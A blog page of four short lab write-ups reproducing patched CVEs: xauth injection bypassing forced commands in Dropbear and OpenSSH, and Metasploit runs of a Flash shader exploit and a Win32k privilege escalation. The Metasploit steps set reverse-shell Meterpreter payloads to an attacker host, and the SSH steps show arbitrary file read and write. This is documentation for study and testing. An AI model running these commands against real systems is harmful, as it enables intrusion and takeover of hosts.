eromang.zataz.comEric Romang Blog – aka wow on ZATAZ.com

Skip to content Eric Romang Blog aka wow on ZATAZ.com Scroll down to content Posts Posted on 17/03/2016 CVE-2016-3116 Dropbear SSH forced-command and security bypass Timeline : Vulnerability discovered and reported to the vendor by tintinweb Patch provided by the vendor the 2016-03-09 PoC and details provided by tintinweb the 2016-03-10 PoC provided by : tintinweb Reference(s) : CVE-2016-3116 Affected version(s) : All versions of dropbear SSH prior to 2016.72 with X11Forwarding enabled. Tested on : Ubuntu 15.10 with Dropbear server v2015.71 Description : Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth. Injection of xauth commands grants the ability to read arbitrary files under the authenticated user’s privilege, Other xauth commands allow limited information leakage, file overwrite, port probing and generally expose xauth, which was not written with a hostile user in mind, as an attack surface. xauth is run under the user’s privilege, so this vulnerability offers no additional access to unrestricted accounts, but could circumvent key or account restrictions such as sshd_config ForceCommand, authorized_keys command=”…” or restricted shells. Commands : Create a shell (/bin/bash) user1: - with ssh key or password authentication - add a force commands in authorized_keys file, like command="whoami" Normally only the command “whoami” will be executed when SSH authentication will be done Create a non-shell (/bin/false) user2 Start dropbear dropbear -R -F -E -p 2222 User provided PoC python script and connect to the vulnerable host python poc.py For example: python poc.py 192.168.6.146 22 user1 test “.readfile” command allow to read files on the system “.writefile” command allow to write files on the system Share this: Click to share on Facebook (Opens in new window) Click to share on Twitter (Opens in new window) Click to share on LinkedIn (Opens in new window) Click to share on Reddit (Opens in new window) Click to email this to a friend (Opens in new window) Click to print (Opens in new window) More Click to share on Pinterest (Opens in new window) Click to share on Pocket (Opens in new window) Click to share on Tumblr (Opens in new window) Posted on 17/03/2016 CVE-2016-3115 OpenSSH forced-command and security bypass Timeline : Vulnerability discovered and reported to the vendor by tintinweb Patch provided by the vendor the 2016-03-09 PoC and details provided by tintinweb the 2016-03-10 PoC provided by : tintinweb Reference(s) : CVE-2016-3115 Affected version(s) : All versions of OpenSSH prior to 7.2p2 with X11Forwarding enabled. Tested on : Ubuntu 15.10 with OpenSSH_6.9p1 Ubuntu-2, OpenSSL 1.0.2d 9 Jul 2015 Description : Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth. Injection of xauth commands grants the ability to read arbitrary files under the authenticated user’s privilege, Other xauth commands allow limited information leakage, file overwrite, port probing and generally expose xauth, which was not written with a hostile user in mind, as an attack surface. xauth is run under the user’s privilege, so this vulnerability offers no additional access to unrestricted accounts, but could circumvent key or account restrictions such as sshd_config ForceCommand, authorized_keys command=”…” or restricted shells. Commands : Create a shell (/bin/bash) user1: - with ssh key or password authentication - add a force commands in authorized_keys file, like command="whoami" Normally only the command “whoami” will be executed when SSH authentication will be done Create a non-shell (/bin/false) user2 User provided PoC python script and connect to the vulnerable host python poc.py For example: python poc.py 192.168.6.146 22 user1 test “.readfile” command allow to read files on the system “.writefile” command allow to write files on the system Share this: Click to share on Facebook (Opens in new window) Click to share on Twitter (Opens in new window) Click to share on LinkedIn (Opens in new window) Click to share on Reddit (Opens in new window) Click to email this to a friend (Opens in new window) Click to print (Opens in new window) More Click to share on Pinterest (Opens in new window) Click to share on Pocket (Opens in new window) Click to share on Tumblr (Opens in new window) Posted on 29/02/2016 29/02/2016 CVE-2015-1701 Windows ClientCopyImage Win32k Exploit Timeline : Vulnerability discovered exploited in the wild by FireEye the 2015-04-13 Patch provided by the vendor via MS15-051 the 2015-05-12 PoC provided by hfiref0x the 2015-05-12 Metasploit PoC provided the 2015-06-03 PoC provided by : Unknown hfirefox OJ Reeves Spencer McIntyre Reference(s) : CVE-2015-1701 MS15-051 Affected version(s) : Windows Server 2003 Service Pack 2 Windows Vista Service Pack 2 Windows Server 2008 Service Pack 2 Windows 7 Service Pack 1 Tested on : Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188 ( CVE-2015-3105 ) for remote exploitation Description : This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64. Commands : Remote exploitation use exploit/multi/browser/adobe_flash_shader_drawing_fill set SRVHOST 192.168.6.138 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 run getuid Local privileges escalation use exploit/windows/local/ms15_051_client_copy_image set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 4445 set SESSION 1 run getuid Share this: Click to share on Facebook (Opens in new window) Click to share on Twitter (Opens in new window) Click to share on LinkedIn (Opens in new window) Click to share on Reddit (Opens in new window) Click to email this to a friend (Opens in new window) Click to print (Opens in new window) More Click to share on Pinterest (Opens in new window) Click to share on Pocket (Opens in new window) Click to share on Tumblr (Opens in new window) Posted on 29/02/2016 CVE-2015-3105 Adobe Flash Player Drawing Fill Shader Memory Corruption Timeline : Vulnerability discovered and reported to the vendor by Chris Evans of Google Project Zero Patch provided by the vendor via APSB15-11 the 2015-06-09 Vulnerability discovered exploited in the Exploit Kits the 2015-06-16 Metasploit PoC provided the 2015-06-25 PoC provided by : Chris Evans Unknown juan vazquez Reference(s) : CVE-2015-3105 APSB15-11 Affected version(s) : Adobe Flash Player 16.0.0.305 and earlier versions Adobe Flash Player 11.2.202.442 and earlier 11.x versions Tested on : Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188 Description : This module exploits a memory corruption happening when applying a Shader as a drawing fill as exploited in the wild on June 2015. This module has been tested successfully on: * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188 * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188 * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188 * Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460. Commands : use exploit/multi/browser/adobe_flash_shader_drawing_fill set SRVHOST 192.168.6.138 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 run getuid sysinfo Share this: Click to share on Facebook (Opens in new window) Click to share on Twitter (Opens in new window) Click to share on LinkedIn (Opens in new window) Click to share on Reddit (Opens in new window) Click to email this to a friend (Opens in new window) Click to print (Opens in new window) More Click to share on Pinterest (Opens in new window) Click to share on Pocket (Opens in new window) Click to share on Tumblr (Opens in new window) Posts navigation Page 1 Page 2 … Page 117 Next page Follow Me! Recent Posts: Eric Romang Blog CVE-2016-3116 Dropbear SSH forced-command and security bypass CVE-2016-3115 OpenSSH forced-command and...